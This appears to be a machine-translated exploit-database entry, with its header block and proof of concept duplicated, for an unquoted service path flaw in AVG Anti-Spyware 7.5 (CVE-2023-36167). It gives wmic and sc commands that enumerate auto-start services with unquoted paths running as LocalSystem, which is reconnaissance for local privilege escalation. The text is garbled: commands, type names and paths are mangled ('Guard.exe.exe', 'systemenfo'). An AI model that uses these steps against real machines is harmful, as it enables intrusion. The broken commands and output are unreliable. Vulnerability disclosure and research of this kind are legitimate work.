#利用标题: AVG反间谍软件7.5-未引用的服务路径
#date: 06/07/2023
#利用作者: Idan Malihi
#供应商homepage: https://www.avg.com
#软件link: https://www.avg.com/en-ww/homepage#pc
#版本: 7.5
#测试在: Microsoft Windows 10 Pro
#CVE : CVE-2023-36167
#poc
C: \ userwmic服务获取名称,路径名,displayName,startmode | findstr /i自动| findstr /i /v'C: \ Windows \\'| findstr /i /v'''
AVG反间谍软件防护avg反间谍软件后卫C: \ Program Files(x86)\ Grisoft \ AVG Anti-Spyware 7.5 \ Guard.exe Auto
C: \ userssc QC'AVG反间谍软件'
[SC] QueryServiceConfig成功
service_name: AVG反间谍软件护罩
类型: 10 WIN32_OUNT_PROCESS
start_type : 2 auto_start
error_control : 1正常
Binary_path_name : C: \ Program Files(x86)\ Grisoft \ AVG Anti-Spyware 7.5 \ Guard.exe.exe
LOAD_ORDER_GROUP :
标签: 0
display_name : AVG反间谍软件护罩
依赖项:
service_start_name :本地系统
C: \ usersystemenfo
主机名称:桌面LA7J17P
OS名称: Microsoft Windows 10 Pro
OS版本: 10.0.19042 N/A构建19042
OS制造商: Microsoft Corporation
#date: 06/07/2023
#利用作者: Idan Malihi
#供应商homepage: https://www.avg.com
#软件link: https://www.avg.com/en-ww/homepage#pc
#版本: 7.5
#测试在: Microsoft Windows 10 Pro
#CVE : CVE-2023-36167
#poc
C: \ userwmic服务获取名称,路径名,displayName,startmode | findstr /i自动| findstr /i /v'C: \ Windows \\'| findstr /i /v'''
AVG反间谍软件防护avg反间谍软件后卫C: \ Program Files(x86)\ Grisoft \ AVG Anti-Spyware 7.5 \ Guard.exe Auto
C: \ userssc QC'AVG反间谍软件'
[SC] QueryServiceConfig成功
service_name: AVG反间谍软件护罩
类型: 10 WIN32_OUNT_PROCESS
start_type : 2 auto_start
error_control : 1正常
Binary_path_name : C: \ Program Files(x86)\ Grisoft \ AVG Anti-Spyware 7.5 \ Guard.exe.exe
LOAD_ORDER_GROUP :
标签: 0
display_name : AVG反间谍软件护罩
依赖项:
service_start_name :本地系统
C: \ usersystemenfo
主机名称:桌面LA7J17P
OS名称: Microsoft Windows 10 Pro
OS版本: 10.0.19042 N/A构建19042
OS制造商: Microsoft Corporation